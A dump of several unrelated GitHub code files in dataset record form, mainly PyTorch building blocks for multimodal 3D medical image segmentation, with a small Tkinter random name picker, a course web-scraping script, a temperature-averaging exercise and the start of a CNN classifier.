self.forward_standard(inputs[0])\r\n\r\n def forward_concat(self, inputs1, inputs2):\r\n return torch.cat([inputs1, self.up(inputs2)], 1)\r\n\r\n def forward_standard(self, inputs):\r\n return self.up(inputs)\r\n\r\nclass UNetConvBlock3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, padding='SAME', norm_type='instance', bias=True, flag='encoder'):\r\n super(UNetConvBlock3D, self).__init__()\r\n if flag=='encoder':\r\n self.conv1 = ConvNormRelu3D(in_channels, out_channels//2, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = ConvNormRelu3D(out_channels//2, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n else:\r\n self.conv1 = ConvNormRelu3D(in_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = ConvNormRelu3D(out_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n\r\n def forward(self, inputs):\r\n outputs = self.conv1(inputs)\r\n outputs = self.conv2(outputs)\r\n return outputs\r\n\r\nclass UNetConvBlock3D_hved(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, padding='SAME', norm_type='instance', bias=True, flag='encoder'):\r\n super(UNetConvBlock3D_hved, 
self).__init__()\r\n if flag=='encoder':\r\n self.conv1 = NormRelu3DConv(in_channels, out_channels//2, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = NormRelu3DConv(out_channels//2, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n else:\r\n self.conv1 = NormRelu3DConv(in_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = NormRelu3DConv(out_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n\r\n def forward(self, inputs):\r\n outputs = self.conv1(inputs)\r\n outputs = self.conv2(outputs)\r\n return outputs\r\n\r\nclass ConvNormRelu3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\r\n padding='SAME', bias=True, dilation=1, norm_type='instance'):\r\n\r\n super(ConvNormRelu3D, self).__init__()\r\n norm = nn.BatchNorm3d if norm_type == 'batch' else nn.InstanceNorm3d\r\n if padding == 'same':\r\n p = padding\r\n elif padding == 'SAME':\r\n p = kernel_size // 2\r\n else:\r\n p = 0\r\n\r\n\r\n self.unit = nn.Sequential(nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size,\r\n padding=p, stride=stride, bias=bias, dilation=dilation),\r\n norm(out_channels),\r\n nn.LeakyReLU(0.01, inplace=True))\r\n\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\nclass NormRelu3DConv(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\r\n padding='SAME', bias=True, dilation=1, norm_type='instance'):\r\n\r\n super(NormRelu3DConv, self).__init__()\r\n norm = nn.BatchNorm3d if norm_type == 'batch' else nn.InstanceNorm3d\r\n if padding == 'SAME':\r\n p = kernel_size // 2\r\n else:\r\n p = 0\r\n\r\n self.unit = nn.Sequential(\r\n norm(in_channels),\r\n nn.LeakyReLU(0.01, inplace=True),\r\n nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, padding=p, stride=stride, bias=bias, dilation=dilation)\r\n )\r\n\r\n def getpre_n(self, pre):\r\n re = {}\r\n p = pre.flatten()\r\n print(pre.shape)\r\n for i in range(len(p)):\r\n n = int(abs(p[i]))\r\n if n in re.keys():\r\n re[n] += 1\r\n else:\r\n re[n] = 1\r\n print(re)\r\n\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\n# ****************************************************************************************\r\n# ------------------------------ TFusion Basic blocks ----------------------------------\r\n# ****************************************************************************************\r\n\r\nclass TF_3D(nn.Module):\r\n def __init__(self, embedding_dim=1024, volumn_size=8, nhead=4, num_layers=8, method='TF'):\r\n super(TF_3D, self).__init__()\r\n self.embedding_dim = embedding_dim\r\n self.d_model = self.embedding_dim\r\n self.patch_dim = 8\r\n self.method = method\r\n self.scale_factor = volumn_size // self.patch_dim\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(d_model=self.d_model, nhead=nhead,\r\n batch_first=True, dim_feedforward=self.d_model * 4)\r\n self.fusion_block = nn.TransformerEncoder(encoder_layer, num_layers=num_layers)\r\n\r\n self.dropout = nn.Dropout(p=0.1)\r\n self.avgpool = nn.AdaptiveAvgPool3d((self.patch_dim, self.patch_dim, self.patch_dim))\r\n self.upsample = DUpsampling3D(self.embedding_dim, self.scale_factor)\r\n if method=='Token':\r\n self.fusion_token = nn.parameter.Parameter(torch.zeros((1, self.patch_dim ** 3, self.d_model)))\r\n\r\n def forward(self, all_content):\r\n\r\n n_modality = 
len(all_content)\r\n\r\n token_content = self.project(all_content)\r\n position_enc = PositionalEncoding(self.d_model, token_content.size(1))\r\n\r\n out = self.fusion_block(self.dropout(position_enc(token_content)))\r\n atten_map = self.reproject(out, n_modality, self.method)\r\n return self.atten(all_content, atten_map, n_modality)\r\n\r\n def project(self, all_content):\r\n n_modality = len(all_content)\r\n token_content_in = None\r\n for i in range(n_modality):\r\n content = self.avgpool(all_content[i])\r\n content = content.permute(0, 2, 3, 4, 1).contiguous()\r\n content2 = content.view(content.size(0), -1, self.embedding_dim)\r\n if i == 0:\r\n token_content_in = content2\r\n else:\r\n token_content_in = torch.cat([token_content_in, content2], dim=1)\r\n return token_content_in\r\n\r\n def reproject(self, atten_map, n_modality, method):\r\n n_patch = self.patch_dim ** 3\r\n a_m0 = None\r\n for i in range(n_modality):\r\n atten_mapi = atten_map[:, n_patch*i : n_patch*(i+1), :].view(\r\n atten_map.size(0),\r\n self.patch_dim,\r\n self.patch_dim,\r\n self.patch_dim,\r\n self.embedding_dim,\r\n )\r\n\r\n atten_mapi = atten_mapi.permute(0, 4, 1, 2, 3).contiguous()\r\n atten_mapi = self.upsample(atten_mapi).unsqueeze(dim=0)\r\n\r\n if a_m0 == None:\r\n a_m0 = atten_mapi\r\n else:\r\n a_m0 = torch.cat([a_m0, atten_mapi], dim=0)\r\n\r\n a_m = F.softmax(a_m0, dim=0)\r\n return a_m\r\n\r\n def atten(self, all_content, atten_map, n_modality):\r\n output = None\r\n for i in range(n_modality):\r\n a_m = atten_map[i, :, :, :, :, :]\r\n assert all_content[i].shape == a_m.shape, 'all_content and a_m cannot match!!'\r\n if output == None:\r\n output = all_content[i] * a_m\r\n else:\r\n output += all_content[i] * a_m\r\n return output\r\n\r\n\r\nclass DUpsampling3D(nn.Module):\r\n def __init__(self, inplanes, scale):\r\n super(DUpsampling3D, self).__init__()\r\n output_channel = inplanes * (scale ** 3)\r\n self.conv_3d = nn.Conv3d(inplanes, output_channel, kernel_size=1, stride=1, bias=False)\r\n self.scale = scale\r\n\r\n def forward(self, x):\r\n x = self.conv_3d(x)\r\n B, C, D, H, W = x.size()\r\n\r\n x_permuted = x.permute(0, 4, 3, 2, 1)\r\n\r\n x_permuted = x_permuted.contiguous().view((B, W, H, D * self.scale, int(C / (self.scale))))\r\n\r\n x_permuted = x_permuted.permute(0, 3, 1, 2, 4)\r\n\r\n\r\n x_permuted = x_permuted.contiguous().view((B, D * self.scale, W, H * self.scale, int(C / (self.scale**2))))\r\n\r\n x_permuted = x_permuted.permute(0, 1, 3, 2, 4)\r\n\r\n x_permuted = x_permuted.contiguous().view(\r\n (B, D * self.scale, H * self.scale, W * self.scale, int(C / (self.scale **3))))\r\n\r\n x = x_permuted.permute(0, 4, 1, 2, 3)\r\n\r\n return x\r\n\r\nclass PositionalEncoding(nn.Module):\r\n\r\n def __init__(self, d_hid, n_position=200):\r\n super(PositionalEncoding, self).__init__()\r\n\r\n self.register_buffer('pos_table', self._get_sinusoid_encoding_table(n_position, d_hid))\r\n\r\n def _get_sinusoid_encoding_table(self, n_position, d_hid):\r\n\r\n def get_position_angle_vec(position):\r\n return [position / np.power(10000, 2 * (hid_j // 2) / d_hid) for hid_j in range(d_hid)]\r\n\r\n sinusoid_table = np.array([get_position_angle_vec(pos_i) for pos_i in range(n_position)])\r\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2])\r\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2])\r\n\r\n return torch.FloatTensor(sinusoid_table).unsqueeze(0)\r\n\r\n def forward(self, x):\r\n return x + self.pos_table[:, :x.size(1)].clone().detach().to(torch.device('cuda'))\r\n\r\n\r\n# 
****************************************************************************************\r\n# ------------------------------------ rmbts basic blocks ------------------------------\r\n# ****************************************************************************************\r\nclass general_conv3d(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\r\n padding='SAME', bias=True, dilation=1, norm_type=True, dropout=0.0, act=True):\r\n\r\n super(general_conv3d, self).__init__()\r\n if padding == 'SAME':\r\n p = kernel_size // 2\r\n else:\r\n p = 0\r\n self.unit = nn.Sequential(nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size,\r\n padding=p, stride=stride, bias=bias, dilation=dilation))\r\n if dropout != 0.0:\r\n self.unit.add_module('drop', nn.Dropout(p=dropout))\r\n if norm_type:\r\n self.unit.add_module('norm', nn.InstanceNorm3d(out_channels))\r\n if act:\r\n self.unit.add_module('activation',nn.LeakyReLU(0.01, inplace=True))\r\n\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\nclass linear(nn.Module):\r\n def __init__(self, units):\r\n\r\n super(linear, self).__init__()\r\n self.unit = nn.Sequential(nn.Flatten(),\r\n nn.LazyLinear(units))\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\nclass style_encoder(nn.Module):\r\n def __init__(self, in_channels, n_base_ch_se=32):\r\n super(style_encoder, self).__init__()\r\n\r\n self.unit = nn.Sequential(\r\n general_conv3d(in_channels, n_base_ch_se, kernel_size=7, stride=1),\r\n general_conv3d(n_base_ch_se, n_base_ch_se*2, kernel_size=4, stride=2),\r\n general_conv3d(n_base_ch_se*2, n_base_ch_se*4, kernel_size=4, stride=2),\r\n general_conv3d(n_base_ch_se*4, n_base_ch_se*4, kernel_size=4, stride=2),\r\n general_conv3d(n_base_ch_se*4, n_base_ch_se*4, kernel_size=4, stride=2),\r\n )\r\n self.unit2 = general_conv3d(n_base_ch_se*4, 8, kernel_size=1, stride=1, norm_type=False, act=False)\r\n\r\n def forward(self, inputs):\r\n output = self.unit(inputs)\r\n output = torch.mean(output, dim=(2, 3, 4), keepdim=True)\r\n return self.unit2(output)\r\n\r\n\r\nclass content_encoder(nn.Module):\r\n def __init__(self, in_channels, n_base_filters=16):\r\n super(content_encoder, self).__init__()\r\n self.unit1_0 = general_conv3d(in_channels, n_base_filters)\r\n self.unit1 = nn.Sequential(\r\n general_conv3d(n_base_filters, n_base_filters, dropout=0.3),\r\n general_conv3d(n_base_filters, n_base_filters),\r\n )\r\n\r\n self.unit2_0 = general_conv3d(n_base_filters, n_base_filters*2, stride=2)\r\n self.unit2 = nn.Sequential(\r\n general_conv3d(n_base_filters*2, n_base_filters*2, dropout=0.3),\r\n general_conv3d(n_base_filters*2, n_base_filters*2),\r\n )\r\n\r\n self.unit3_0 = general_conv3d(n_base_filters*2, n_base_filters*4, stride=2)\r\n self.unit3 = nn.Sequential(\r\n general_conv3d(n_base_filters*4, n_base_filters*4, dropout=0.3),\r\n general_conv3d(n_base_filters*4, n_base_filters*4 ),\r\n )\r\n\r\n self.unit4_0 = general_conv3d(n_base_filters * 4, n_base_filters*8, stride=2)\r\n self.unit4 = nn.Sequential(\r\n general_conv3d(n_base_filters*8, n_base_filters * 8, dropout=0.3),\r\n general_conv3d(n_base_filters * 8, n_base_filters * 8),\r\n )\r\n\r\n def forward(self, inputs):\r\n output1_0 = self.unit1_0(inputs)\r\n output1 = self.unit1(output1_0) + output1_0\r\n\r\n output2_0 = self.unit2_0(output1)\r\n output2 = self.unit2(output2_0) + output2_0\r\n\r\n output3_0 = self.unit3_0(output2)\r\n output3 = self.unit3(output3_0) + output3_0\r\n\r\n output4_0 = self.unit4_0(output3)\r\n 
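# deepest stage: the addition below gives unit4 a residual (skip) connection at 1/8 resolution\r\n        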
output4 = self.unit4(output4_0) + output4_0\r\n\r\n return {\r\n 's1': output1,\r\n 's2': output2,\r\n 's3': output3,\r\n 's4': output4,\r\n }\r\n\r\nclass image_decoder(nn.Module):\r\n def __init__(self, input_channel, mlp_ch=128, img_ch=1, scale=4):\r\n super(image_decoder, self).__init__()\r\n channel = mlp_ch\r\n self.scale = scale\r\n self.ar1 = adaptive_resblock(input_channel, channel)\r\n self.ar2 = adaptive_resblock(channel, channel)\r\n self.ar3 = adaptive_resblock(channel, channel)\r\n self.ar4 = adaptive_resblock(channel, channel)\r\n\r\n self.mlp = mlp(channel)\r\n self.features = nn.Sequential()\r\n in_channel = channel\r\n out_channel = channel\r\n self.lrelu = nn.LeakyReLU(0.01)\r\n for i in range(scale-1):\r\n out_channel = in_channel // 2\r\n up_block = nn.Upsample(scale_factor=2, mode='trilinear', align_corners=False)\r\n conv_block = general_conv3d(in_channel, out_channel, kernel_size=5, stride=1)\r\n norm_block = nn.InstanceNorm3d(out_channel)\r\n self.features.add_module('upblock%d' % (i+1), up_block)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n self.features.add_module('normblock%d' % (i+1), norm_block)\r\n\r\n in_channel = out_channel\r\n self.conv_final = general_conv3d(out_channel, img_ch, kernel_size=7, stride=1)\r\n\r\n\r\n def forward(self, style, content):\r\n mu, sigma = self.mlp(style)\r\n x = self.ar1(content, mu, sigma)\r\n x = self.ar2(x, mu, sigma)\r\n x = self.ar3(x, mu, sigma)\r\n x = self.ar4(x, mu, sigma)\r\n\r\n for i in range(self.scale - 1):\r\n x = getattr(self.features, 'upblock%d' % (i+1))(x)\r\n x = getattr(self.features, 'convblock%d' % (i+1))(x)\r\n x = getattr(self.features, 'normblock%d' % (i+1))(x)\r\n x = self.lrelu(x)\r\n\r\n x = self.conv_final(x)\r\n\r\n return x, mu, sigma\r\n\r\nclass mask_decoder(nn.Module):\r\n def __init__(self, input_channel, n_base_filters=16, num_cls=4):\r\n super(mask_decoder, self).__init__()\r\n\r\n self.features = nn.Sequential()\r\n in_channel = input_channel\r\n out_channel = n_base_filters * 4\r\n for i in range(3):\r\n up_block = nn.Upsample(scale_factor=2, mode='trilinear', align_corners=False)\r\n conv_block1 = general_conv3d(in_channel, out_channel)\r\n conv_block2 = general_conv3d(out_channel*2, out_channel)\r\n conv_block3 = general_conv3d(out_channel, out_channel, kernel_size=1)\r\n\r\n self.features.add_module('upblock%d' % (i+1), up_block)\r\n self.features.add_module('convblock1%d' % (i+1), conv_block1)\r\n self.features.add_module('convblock2%d' % (i+1), conv_block2)\r\n self.features.add_module('convblock3%d' % (i+1), conv_block3)\r\n\r\n in_channel = out_channel\r\n out_channel = out_channel // 2\r\n\r\n self.conv_seg = general_conv3d(in_channel, num_cls, kernel_size=1, norm_type=False, act=False)\r\n\r\n\r\n def forward(self, inp):\r\n input = [inp['e4_out'], inp['e3_out'], inp['e2_out'], inp['e1_out']]\r\n\r\n out = input[0]\r\n for i in range(3):\r\n out = getattr(self.features, 'upblock%d' % (i + 1))(out)\r\n out = getattr(self.features, 'convblock1%d' % (i + 1))(out)\r\n out = torch.cat([out, input[i+1]], dim=1)\r\n out = getattr(self.features, 'convblock2%d' % (i + 1))(out)\r\n out = getattr(self.features, 'convblock3%d' % (i + 1))(out)\r\n seg = self.conv_seg(out)\r\n\r\n return seg\r\n\r\n\r\n\r\n\r\nclass adaptive_resblock(nn.Module):\r\n def __init__(self,input_channel, channel):\r\n super(adaptive_resblock, self).__init__()\r\n self.conv1 = general_conv3d(input_channel, channel)\r\n self.lrelu = nn.LeakyReLU(0.01)\r\n self.conv2 = general_conv3d(channel, 
channel)\r\n\r\n\r\n def forward(self, x_init, mu, sigma):\r\n x = self.adaptive_instance_norm(self.conv1(x_init), mu, sigma)\r\n x = self.lrelu(x)\r\n x = self.adaptive_instance_norm(self.conv2(x), mu, sigma)\r\n return x + x_init\r\n\r\n\r\n def adaptive_instance_norm(self, content, gamma, beta):\r\n c_mean = torch.mean(content, dim=(2, 3, 4), keepdim=True)\r\n c_std = torch.std(content, dim=(2, 3, 4), keepdim=True)\r\n return gamma * ((content - c_mean) / c_std) + beta\r\n\r\nclass mlp(nn.Module):\r\n def __init__(self, channel):\r\n super(mlp, self).__init__()\r\n self.channel = channel\r\n self.unit = nn.Sequential(\r\n linear(channel),\r\n nn.LeakyReLU(0.01),\r\n linear(channel),\r\n nn.LeakyReLU(0.01),\r\n )\r\n self.get_mu = linear(channel)\r\n self.get_sigma = linear(channel)\r\n\r\n def forward(self, style):\r\n s = self.unit(style)\r\n mu = self.get_mu(s)\r\n sigma = self.get_sigma(s)\r\n\r\n mu = mu.view(-1, self.channel, 1, 1, 1)\r\n sigma = sigma.view(-1, self.channel, 1, 1, 1)\r\n\r\n return mu, sigma\r\n\r\n\r\n# ****************************************************************************************\r\n# ------------------------------------- lmcr basic blocks -------------------------------\r\n# ****************************************************************************************\r\nclass ResDilBlock3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, norm_type='instance', bias=True, flag='encoder'):\r\n super(ResDilBlock3D, self).__init__()\r\n\r\n self.conv1 = ConvNormRelu3D(in_channels, out_channels, kernel_size=kernel_size, padding='same',\r\n norm_type=norm_type, dilation=2, bias=bias)\r\n self.conv2 = ConvNormRelu3D(out_channels, out_channels, kernel_size=kernel_size, padding='same',\r\n norm_type=norm_type, dilation=4, bias=bias)\r\n self.relu = nn.LeakyReLU(0.01, inplace=True)\r\n\r\n def forward(self, inputs):\r\n outputs = self.conv1(inputs)\r\n outputs = self.conv2(outputs)\r\n return self.relu(outputs+inputs)\r\n\r\n\r\nclass LMCREncoder(nn.Module):\r\n def __init__(self, in_channels=1, feature_maps=64, levels=4, norm_type='instance', use_dropout=True, bias=True):\r\n super(LMCREncoder, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n self.use_dropout = use_dropout\r\n if self.use_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n in_features = in_channels\r\n for i in range(levels):\r\n out_features = (2**i) * feature_maps\r\n\r\n conv_block = ConvNormRelu3D(in_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n resdil_block = ResDilBlock3D(out_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('resdilblock%d' % (i + 1), resdil_block)\r\n\r\n pool = nn.MaxPool3d(kernel_size=2, stride=2)\r\n self.features.add_module('pool%d' % (i+1), pool)\r\n\r\n in_features = out_features\r\n\r\n\r\n def forward(self, inputs):\r\n encoder_outputs = []\r\n outputs = inputs\r\n for i in range(self.levels):\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n outputs = getattr(self.features, 'resdilblock%d' % (i+1))(outputs)\r\n\r\n if i == self.levels-1:\r\n continue\r\n if self.use_dropout:\r\n encoder_outputs.append(self.dropout(outputs))\r\n else:\r\n encoder_outputs.append(outputs)\r\n outputs = getattr(self.features, 'pool%d' % (i+1))(outputs)\r\n\r\n return encoder_outputs, outputs\r\n\r\n\r\nclass 
LMCRDecoder(nn.Module):\r\n    def __init__(self, out_channels, feature_maps=64, levels=4, norm_type='instance', bias=True, type='seg'):\r\n        super(LMCRDecoder, self).__init__()\r\n        self.out_channels = out_channels\r\n        self.feature_maps = feature_maps\r\n        self.levels = levels\r\n        self.type = type\r\n        self.features = nn.Sequential()\r\n\r\n        for i in range(levels-1):\r\n            upconv = UNetUpSamplingBlock3D(2**(levels-i-1) * feature_maps, 2**(levels-i-1) * feature_maps, deconv=False,\r\n                                           bias=bias)\r\n            self.features.add_module('upconv%d' % (i+1), upconv)\r\n\r\n            conv_block = ConvNormRelu3D(2**(levels-i-2) * feature_maps * 3, 2**(levels-i-2) * feature_maps, norm_type=norm_type, bias=bias)\r\n            self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n            resdil_block = ResDilBlock3D(2**(levels-i-2) * feature_maps, 2**(levels-i-2) * feature_maps, norm_type=norm_type, bias=bias)\r\n            self.features.add_module('resdilblock%d' % (i+1), resdil_block)\r\n\r\n            if self.type=='seg':\r\n                conv = nn.Conv3d(2**(levels-i-2) * feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n                self.features.add_module('conv%d' % (i + 1), conv)\r\n                up = UNetUpSamplingBlock3D(2 ** (levels - i - 1) * feature_maps, 2 ** (levels - i - 1) * feature_maps,\r\n                                           deconv=False,\r\n                                           bias=bias)\r\n                self.features.add_module('up%d' % (i + 1), up)\r\n        self.score = nn.Conv3d(feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n\r\n    def forward(self, inputs, encoder_outputs):\r\n        encoder_outputs.reverse()\r\n        outputs = inputs\r\n        deep_outputs = None\r\n\r\n        for i in range(self.levels-1):\r\n            outputs = getattr(self.features, 'upconv%d' % (i+1))(outputs)\r\n            outputs = torch.cat([encoder_outputs[i], outputs], dim=1)\r\n            outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n            outputs = getattr(self.features, 'resdilblock%d' % (i+1))(outputs)\r\n            if self.type == 'seg' and i != self.levels-2:\r\n                if deep_outputs is None:\r\n                    deep_outputs = getattr(self.features, 'conv%d' % (i+1))(outputs.clone())\r\n                else:\r\n                    deep_outputs += getattr(self.features, 'conv%d' % (i+1))(outputs.clone())\r\n                deep_outputs = getattr(self.features, 'up%d' % (i+1))(deep_outputs)\r\n\r\n        encoder_outputs.reverse()\r\n        # compare against self.type: the builtin type is never equal to 'seg', so the deep-supervision output was unreachable\r\n        if self.type == 'seg':\r\n            return deep_outputs + self.score(outputs)\r\n        else:\r\n            return self.score(outputs)\r\n\r\nclass MPE(nn.Module):\r\n    def __init__(self, channels):\r\n        super(MPE, self).__init__()\r\n        self.pool = nn.AdaptiveAvgPool3d(1)\r\n        self.unit = nn.Sequential(\r\n            nn.Linear(channels, channels),\r\n            nn.LeakyReLU(0.01, inplace=True),\r\n            nn.Linear(channels, 4)\r\n        )\r\n\r\n    def forward(self, data):\r\n        output = self.pool(data).view(data.size(0),-1)\r\n        output = self.unit(output)\r\n        return output\r\n\r\n\r\nclass CR(nn.Module):\r\n    def __init__(self, channels):\r\n        super(CR, self).__init__()\r\n        self.MPE = MPE(channels)\r\n\r\n    def forward(self, inputs):\r\n        outputs = []\r\n\r\n        f0 = self.MPE(inputs[0])\r\n        outputs.append(f0[0][0]+\r\n                       f0[0][1]*inputs[1]+\r\n                       f0[0][2]*inputs[2]+\r\n                       f0[0][3]*inputs[3])\r\n\r\n        f1 = self.MPE(inputs[1])\r\n        outputs.append(f1[0][0] * inputs[0] +\r\n                       f1[0][1] +\r\n                       f1[0][2] * inputs[2] +\r\n                       f1[0][3] * inputs[3])\r\n\r\n        f2 = self.MPE(inputs[2])\r\n        outputs.append(f2[0][0] * inputs[0] +\r\n                       f2[0][1] * inputs[1] +\r\n                       f2[0][2] +\r\n                       f2[0][3] * inputs[3])\r\n\r\n        f3 = self.MPE(inputs[3])\r\n        outputs.append(f3[0][0] * inputs[0] +\r\n                       f3[0][1] * inputs[1] +\r\n                       f3[0][2] * inputs[2] +\r\n                       f3[0][3] )\r\n        return outputs\r\n\r\nclass LMCR_Fusion(nn.Module):\r\n    def __init__(self, channels):\r\n
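        # fuse the four recalibrated modality features via channel (ca) and spatial (sa) attention\r\n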
        super(LMCR_Fusion, self).__init__()\r\n        self.pool = nn.AdaptiveAvgPool3d(1)\r\n        self.ca = nn.Sequential(\r\n            nn.Linear(channels*4, channels*4),\r\n            nn.LeakyReLU(0.01, inplace=True),\r\n            nn.Linear(channels*4, channels*4)\r\n        )\r\n        self.sa = nn.Conv3d(channels*4, 1, kernel_size=1, stride=1)\r\n        self.conv = nn.Conv3d(channels*4, channels, kernel_size=1, stride=1)\r\n    def forward(self, inputs):\r\n        input = None\r\n        for i in range(len(inputs)):\r\n            if input is None:\r\n                input = inputs[i]\r\n            else:\r\n                input = torch.cat([input, inputs[i]],dim=1)\r\n\r\n        ca_map = torch.sigmoid(self.ca(self.pool(input).view(input.size(0),-1)))\r\n        ca_map = ca_map.unsqueeze(dim=-1).unsqueeze(dim=-1).unsqueeze(dim=-1)\r\n        sa_map = torch.sigmoid(self.sa(input))\r\n        return self.conv(input*ca_map+input*sa_map)\r\n","repo_name":"scut-cszcl/SFusion","sub_path":"net/BasicBlock.py","file_name":"BasicBlock.py","file_ext":"py","file_size_in_byte":33728,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
{"seq_id":"30550045747","text":"\"\"\"\r\nProgram: randlistpick.py\r\n\"\"\"\r\nfrom breezypythongui import EasyFrame\r\nimport random\r\n\r\nn = [\"Miles\", \"Alexa\", \"Andrew\", \"George\", \"James\", \"Kofi\", \"Kurt\", \"Letisha\", \"Michael\", \"Nicolas\", \"Stepanie\", \"Thomas\"]\r\n\r\nclass RandListPick(EasyFrame):\r\n    \r\n    def __init__(self):\r\n        EasyFrame.__init__(self, \"Random winner pick\")\r\n        \r\n        self.addLabel(\"winner is\",\r\n                      row = 0, column = 0)\r\n        \r\n        self.nameF = self.addTextField(text = \"\",\r\n                                       row = 0, column = 1)\r\n        \r\n        self.addButton(text = \"Random Pick!\",\r\n                       row = 1, column = 0,\r\n                       columnspan = 2,\r\n                       command = self.randPick)\r\n        self.lastWinner = \"\"\r\n        \r\n        \r\n    def randPick(self):\r\n        name = random.choice(n)\r\n        \r\n        while name == self.lastWinner:\r\n            name = random.choice(n)\r\n        \r\n        self.nameF.setText(name)\r\n        self.lastWinner = name\r\n        \r\n        \r\n        \r\n#Definition of the main() function\r\ndef main():\r\n    \"\"\"instantiates and pops up the window\"\"\"\r\n    RandListPick().mainloop()\r\n    \r\nif __name__ == \"__main__\":\r\n    main() ","repo_name":"Milzybyte/randlistpick.py","sub_path":"randlistpick.py","file_name":"randlistpick.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35869144075","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nimport json\n\n# 1-------------------------------------------------\nstart_url = 'http://parsinger.ru/html/index1_page_1.html'\nstart_response = requests.get(start_url, timeout=10)\nstart_soup = BeautifulSoup(start_response.text, 'lxml')\npage_hrefs = [x['href'] for x in start_soup.find('div', class_='pagen').find_all('a')] # collect the links to the watch listing pages\n# 1-------------------------------------------------\n\n# 2------------------------------------------------\njson_items = []\nfor page_href in tqdm(page_hrefs):\n    page_url = f'http://parsinger.ru/html/{page_href}'\n    page_response = requests.get(page_url, timeout=10)\n    page_soup = BeautifulSoup(page_response.text, 'lxml')\n\n    item_hrefs = [x['href'] for x in page_soup.find_all('a', class_='name_item')]\n\n    for href in item_hrefs:\n        item = {}\n        item_url = f'http://parsinger.ru/html/{href}'\n        item_response = requests.get(item_url)\n        item_response.encoding = 'utf-8'\n        item_soup = BeautifulSoup(item_response.text, 'lxml')\n\n        name = item_soup.find('p', id='p_header').text\n
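        # keep only the first whitespace-separated token of the price string\n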
        price = item_soup.find('span', id='price').text.split()[0]\n        item['name'] = name\n        item['price'] = price\n\n        fields = [x['id'] for x in item_soup.find('ul', id='description').find_all('li')]\n        description = item_soup.find('ul', id='description')\n        for field in fields:\n            value = description.find('li', id=field).text.split(': ')[1]\n            item[field] = value\n\n        json_items.append(item)\n# 2---------------------------------------------------\n\n# 3---------------------------------------------------\nwith open('result.json', 'w', encoding='utf-8') as file:\n    json.dump(json_items, file, ensure_ascii=False, indent=4)\nprint(f'File is created. Absolute number of records: {len(json_items)}')\n# 3----------------------------------------------------\n","repo_name":"andreyshishkov/stepik_parsing_course","sub_path":"module_4/4.9/1_json/1_json.py","file_name":"1_json.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"846334161","text":"ILE_DNI = 7 # number of days to average over\n\ntemp = 0\ni = 0\nwhile i < ILE_DNI: # '<', not '<=': read exactly ILE_DNI values to match the divisor below\n    temp_i = float(input(f\"Enter the temperature for day {i}\"))\n    temp += temp_i\n    i += 1\n\nprint(\"Average temperature was: \", temp/ILE_DNI)","repo_name":"KrWojtek19/bootcamp_08122018","sub_path":"basics/zadanie_13.py","file_name":"zadanie_13.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"42875480484","text":"import torch\nfrom torch import nn\nimport torchvision.models as models\nfrom tqdm import tqdm\n\ndef get_model(model_name):\n    if model_name == \"cnn\":\n        return CNN()\n    else:\n        raise ValueError(\"please input model name\")\n\n# ------------ classification model\nclass CNN(nn.Module):\n    def __init__(self):\n        super(CNN, self).__init__()\n        self.layer1 = nn.Sequential(\n            nn.Conv2d(1, 16, kernel_size=3, padding=1), \n            nn.BatchNorm2d(16),\n            nn.Dropout(0.2), \n            nn.ReLU(),\n            nn.MaxPool2d(2) \n        )\n\n        self.layer2 = nn.Sequential(\n            nn.Conv2d(16, 64, kernel_size=3, padding=1), \n            nn.BatchNorm2d(64),\n            nn.Dropout(0.2), \n            nn.ReLU(),\n            nn.MaxPool2d(2) \n        )\n\n        self.layer3 = nn.Sequential(\n            nn.Conv2d(64, 128, kernel_size=3, padding=1), \n            nn.BatchNorm2d(128),\n          